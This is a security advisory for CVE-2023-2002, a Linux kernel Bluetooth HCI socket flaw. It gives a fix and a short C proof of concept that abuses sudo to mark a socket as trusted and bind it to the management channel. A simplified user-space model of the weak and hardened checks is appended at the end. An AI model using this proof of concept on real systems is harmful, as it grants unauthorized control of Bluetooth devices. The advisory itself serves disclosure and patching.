Execution with Unnecessary Privileges Affecting torvalds/linux package, versions [4.9,6.4-rc1)
Threat Intelligence
Exploit Maturity: Proof of concept
EPSS: 0.04% (11th percentile)
- Snyk ID SNYK-UNMANAGED-TORVALDSLINUX-5507220
- published 9 May 2023
- disclosed 16 Apr 2023
- credit Ruihan Li
Introduced: 16 Apr 2023
CVE-2023-2002
How to fix?
Upgrade torvalds/linux to version 6.4-rc1 or higher.
Overview
Affected versions of this package are vulnerable to Execution with Unnecessary Privileges due to a missing capability check in the net/bluetooth/hci_sock.c file. This flaw allows an attacker to execute management commands without authorization, compromising the confidentiality, integrity, and availability of Bluetooth communication.
PoC
    int fd = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);

    /* By executing sudo with an HCI socket as stderr, an ioctl
     * system call makes the HCI socket privileged (i.e. with
     * the HCI_SOCK_TRUSTED flag set).
     */
    int pid = fork();
    if (pid == 0) {
        dup2(fd, 2);
        close(fd);
        execlp("sudo", "sudo");
    }
    waitpid(pid, NULL, 0);

    struct sockaddr_hci haddr;
    haddr.hci_family = AF_BLUETOOTH;
    haddr.hci_dev = HCI_DEV_NONE;
    haddr.hci_channel = HCI_CHANNEL_CONTROL;

    /* The socket has not been bound. It can be bound to the
     * management channel now. After that, the HCI_SOCK_TRUSTED
     * flag is still present, as it will indeed never be cleared.
     */
    bind(fd, (struct sockaddr *)&haddr, sizeof(haddr));
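The PoC depends on a sticky trusted flag being granted from the credentials of whichever task issues the ioctl, not the task that opened the socket. The following user-space model is an added example, not code from the advisory or the kernel; every name in it is hypothetical, and the hardened variant (require the capability of both opener and caller) is shown as one way to close the gap under that assumption.

```c
/* Simplified user-space model of the missing check; not kernel code.
 * All identifiers are hypothetical and exist only for this example. */
#include <stdbool.h>
#include <stdio.h>

struct cred { bool cap_net_admin; };   /* credentials of a task */

struct model_sock {
    struct cred opener;   /* task that created the socket */
    bool trusted;         /* models HCI_SOCK_TRUSTED: set once, never cleared */
};

/* Weak check: only the task issuing the ioctl is examined. */
static void ioctl_weak(struct model_sock *s, struct cred caller) {
    if (caller.cap_net_admin)
        s->trusted = true;
}

/* Hardened check: the opener AND the current caller must both be capable. */
static void ioctl_hardened(struct model_sock *s, struct cred caller) {
    if (s->opener.cap_net_admin && caller.cap_net_admin)
        s->trusted = true;
}

/* Replays the sequence from the PoC: a socket opened by `opener` is handed
 * to a privileged helper that performs an ioctl on it, then the opener binds
 * to the control channel. Returns whether management commands are allowed. */
static bool replay(void (*do_ioctl)(struct model_sock *, struct cred),
                   bool opener_is_admin) {
    struct cred helper = { .cap_net_admin = true };   /* e.g. a setuid program */
    struct model_sock s = { .opener = { opener_is_admin }, .trusted = false };
    do_ioctl(&s, helper);   /* privileged task touches the inherited fd */
    return s.trusted;       /* flag survives the later bind unchanged */
}

int main(void) {
    printf("weak, unprivileged opener:     %d\n", replay(ioctl_weak, false));
    printf("hardened, unprivileged opener: %d\n", replay(ioctl_hardened, false));
    printf("hardened, privileged opener:   %d\n", replay(ioctl_hardened, true));
    return 0;
}
```

With the weak check the unprivileged opener ends up with a trusted socket; with the hardened check only a socket opened by a capable task can become trusted.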